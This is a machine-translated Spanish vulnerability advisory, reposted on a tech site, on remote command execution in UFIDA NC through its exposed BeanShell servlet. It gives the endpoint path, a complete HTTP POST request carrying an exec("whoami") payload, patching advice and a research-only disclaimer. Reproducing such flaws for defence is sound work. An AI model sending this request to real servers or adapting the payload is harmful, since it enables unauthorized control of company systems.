Red de conocimiento informático - Problemas con los teléfonos móviles - Ejecución remota de comandos XYou NC

Ejecución remota de comandos XYou NC

Ejecución remota de comandos de X Game NC

1. Introducción a la vulnerabilidad

UFIDA NC es un software de gestión de nivel empresarial ampliamente utilizado en grandes y medianas empresas. Es una plataforma de información de soluciones de TI que integra modelado, desarrollo, herencia, operación y gestión.

UFIDA NC tiene una vulnerabilidad de deserialización que permite a un atacante ejecutar de forma remota comandos arbitrarios en el servidor de destino mediante la construcción de solicitudes HTTP específicas. (Existe una vulnerabilidad de ejecución remota de comandos en UFIDA NC bsh.servlet.BshServlet, que permite ejecutar comandos remotos a través de BeanShell para obtener permisos del servidor).

2. Alcance del impacto de la vulnerabilidad

UFIDA NC versión completa

3. Reproducción de la vulnerabilidad

Estilo de la página de inicio

URL de vulnerabilidad:

/servlet/~ic/bsh.servlet.BshServlet

Ejecución de acceso:

exec( "whoami")

Paquete detallado:

POST /servlet/~ic/bsh.servlet.BshServlet

host: 127.0.0.1:8080

agente de usuario: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, como Gecko) Chrome/6.0.472.33 Safari/534.3 SE 2.X MetaSr 1.0

Tipo de contenido .application/x-www-form-urlencoded; charset=UTF-8

bsh.script=exec("whoami");

Procesamiento por lotes simple

4. Sugerencias de reparación

1. UF NC es un software comercial. Puede comunicarse directamente con el funcionario de UF NC para obtener el programa de actualización de seguridad.

2. Antes de que se publique el parche de seguridad oficial, se recomienda que las empresas pertinentes limiten estrictamente los derechos de acceso a UF NC y prohíban las solicitudes de IP externas de las aplicaciones de UF NC.

Referencia:

/weixin_45728976/article/details/106560286

http://wiki.peiqi.tech/PeiQi_Wiki/OAE4BAA7E59381E6BC8F E6B49E/E794A8E58F8BOA/E794A8E58F8B20NC 20bsh servlet.A18CE6BC8FE6B49E.html?h=E794A8E58F8B20NC20bsh.servlet.E8A18CE6BC8FE6B49E

Vulnerabilidades pasadas de UF:

Copia de vulnerabilidad de inyección-RCE de UF GRP-u8

Nota: ?

Descargo de responsabilidad: Las herramientas y programas (métodos) de seguridad proporcionados en este sitio pueden ser ofensivos y están destinados únicamente a fines de investigación y enseñanza de seguridad, ¡bajo su propio riesgo!

Suscríbete para ver más artículos reimpresos y notas de estudio

thelostworld

¡Camina junto a ti en el camino hacia la seguridad! ! ! !

上篇: , actualización de acceso al nombre de dominio 下篇: ¿Cuál es mejor, vivo Xplay6 o Xplay5?

Artículos populares